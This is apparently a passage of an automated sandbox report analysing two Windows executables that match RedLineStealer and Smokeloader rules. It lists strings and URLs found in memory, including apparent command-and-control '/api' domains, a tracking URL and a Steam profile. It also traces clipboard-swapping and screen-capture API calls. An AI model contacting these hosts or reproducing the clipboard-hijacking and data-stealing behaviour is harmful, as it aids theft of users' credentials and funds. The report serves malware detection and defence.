    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167576807.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.00000000006CC000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167576807.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.00000000006CC000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.00000000006CC000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.00000000006CC000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=Eq36AUaEgab8&l=en
    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.00000000006CC000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167576807.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167576807.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167576807.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167576807.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
    Source: EB86.tmp.exe, 00000002.00000002.2358896798.000000000065A000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.000000000065A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crowdwarek.shop:443/api
    Source: EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
    Source: EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
    Source: EB86.tmp.exe, 00000002.00000002.2358948638.0000000000693000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
    Source: EB86.tmp.exe, 00000002.00000002.2358948638.0000000000693000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
    Source: EB86.tmp.exe, 00000002.00000002.2358948638.0000000000693000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
    Source: L7GNkeVm5e.exe, 00000000.00000003.4407193910.00000000006A4000.00000004.00000020.00020000.00000000.sdmp, L7GNkeVm5e.exe, 00000000.00000002.4539850806.00000000006A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/
    Source: L7GNkeVm5e.exe, 00000000.00000003.4407193910.00000000006A4000.00000004.00000020.00020000.00000000.sdmp, L7GNkeVm5e.exe, 00000000.00000002.4539850806.00000000006A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/fh/0
    Source: L7GNkeVm5e.exeString found in binary or memory: https://post-to-me.com/track_prt.php?sub=
    Source: L7GNkeVm5e.exe, 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://post-to-me.com/track_prt.php?sub=&cc=DE
    Source: L7GNkeVm5e.exe, 00000000.00000002.4539850806.00000000006A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DE
    Source: EB86.tmp.exe, 00000002.00000002.2358948638.0000000000693000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
    Source: EB86.tmp.exe, 00000002.00000002.2358948638.0000000000693000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
    Source: EB86.tmp.exe, 00000002.00000002.2358896798.000000000065A000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.000000000065A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://robinsharez.shop:443/api
    Source: EB86.tmp.exe, 00000002.00000002.2358948638.0000000000693000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
    Source: EB86.tmp.exe, 00000002.00000002.2358948638.0000000000693000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
    Source: EB86.tmp.exe, 00000002.00000002.2358896798.000000000065A000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.000000000065A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://skidjazzyric.click:443/api
    Source: EB86.tmp.exe, 00000002.00000002.2358948638.0000000000693000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
    Source: EB86.tmp.exe, 00000002.00000002.2358948638.0000000000693000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
    Source: EB86.tmp.exe, 00000002.00000002.2358948638.0000000000693000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
    Source: EB86.tmp.exe, 00000002.00000002.2358948638.0000000000693000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167576807.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.0000000000656000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com
    Source: EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167576807.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.0000000000656000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
    Source: EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167576807.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
    Source: EB86.tmp.exe, 00000002.00000002.2358896798.000000000065A000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.000000000065A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
    Source: EB86.tmp.exe, 00000002.00000002.2358896798.000000000065A000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.000000000065A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900$
    Source: EB86.tmp.exe, 00000002.00000002.2358896798.000000000065A000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.000000000065A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/rf
    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
    Source: EB86.tmp.exe, 00000002.00000002.2358896798.000000000065A000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.000000000065A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com:443/profiles/76561199724331900K
    Source: EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
    Source: EB86.tmp.exe, 00000002.00000003.2167698252.00000000006CC000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167928507.0000000000693000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2358948638.0000000000693000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
    Source: EB86.tmp.exe, 00000002.00000003.2167928507.0000000000693000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2358948638.0000000000693000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb
    Source: EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167576807.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167576807.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.0000000000656000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop
    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
    Source: EB86.tmp.exe, 00000002.00000002.2358896798.000000000065A000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.000000000065A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://versersleep.shop:443/api
    Source: EB86.tmp.exe, 00000002.00000002.2358948638.0000000000693000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
    Source: EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
    Source: EB86.tmp.exe, 00000002.00000002.2358948638.0000000000693000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
    Source: EB86.tmp.exe, 00000002.00000002.2358948638.0000000000693000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167576807.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.0000000000656000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
    Source: EB86.tmp.exe, 00000002.00000002.2358948638.0000000000693000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
    Source: EB86.tmp.exe, 00000002.00000002.2358948638.0000000000693000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
    Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
    Source: unknownHTTPS traffic detected: 172.67.179.207:443 -> 192.168.2.5:49704 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49706 version: TLS 1.2
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: 0_2_004016DF __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_004016DF
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: 0_2_004016DF __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_004016DF
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: 0_2_02101942 __EH_prolog3_GS,Sleep,OpenClipboard,GetClipboardData,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_02101942
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: 0_2_004016DF __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_004016DF
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_00436980 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,StretchBlt,ReleaseDC,DeleteObject,DeleteObject,2_2_00436980

    System Summary

    barindex
    Source: 00000000.00000002.4539762016.0000000000629000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
    Source: 00000002.00000002.2358816622.0000000000602000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
    Source: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
    Source: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: 0_2_02102357 NtdllDefWindowProc_W,GetClientRect,GetDC,CreateSolidBrush,CreatePen,Rectangle,GetDeviceCaps,MulDiv,CreateFontW,SetBkMode,_wcslen,_wcslen,_wcslen,_wcslen,ReleaseDC,0_2_02102357
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: 0_2_021025FB NtdllDefWindowProc_W,PostQuitMessage,0_2_021025FB
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: 0_2_004280120_2_00428012
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: 0_2_004071A10_2_004071A1
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: 0_2_004373C90_2_004373C9
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: 0_2_004274740_2_00427474
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: 0_2_0042D4DE0_2_0042D4DE
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: 0_2_004285500_2_00428550
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: 0_2_0043D6680_2_0043D668
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: 0_2_0041669F0_2_0041669F
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: 0_2_004137150_2_00413715
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: 0_2_004277E60_2_004277E6
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: 0_2_0040E96A0_2_0040E96A
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: 0_2_0042EAD00_2_0042EAD0
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: 0_2_00427A900_2_00427A90
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: 0_2_00418A9F0_2_00418A9F
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: 0_2_00436CAF0_2_00436CAF
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: 0_2_00427D570_2_00427D57
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: 0_2_00413EFB0_2_00413EFB
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: 0_2_021282790_2_02128279
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: 0_2_0212ED370_2_0212ED37
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: 0_2_021141620_2_02114162
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: 0_2_021276DB0_2_021276DB
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: 0_2_0212D7450_2_0212D745
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: 0_2_021287B70_2_021287B7
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: 0_2_02127A4D0_2_02127A4D
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: 0_2_0210EBD10_2_0210EBD1
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: 0_2_021169060_2_02116906
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: 0_2_0211397C0_2_0211397C
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: 0_2_02136F160_2_02136F16
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: 0_2_02127FBE0_2_02127FBE
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: 0_2_02127CF70_2_02127CF7
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: 0_2_02118D060_2_02118D06
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: 0_2_0212ED370_2_0212ED37
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_004088802_2_00408880
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0040B2B02_2_0040B2B0
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_004198402_2_00419840
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_004068502_2_00406850
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_004278602_2_00427860
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_004270702_2_00427070
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0043B8702_2_0043B870
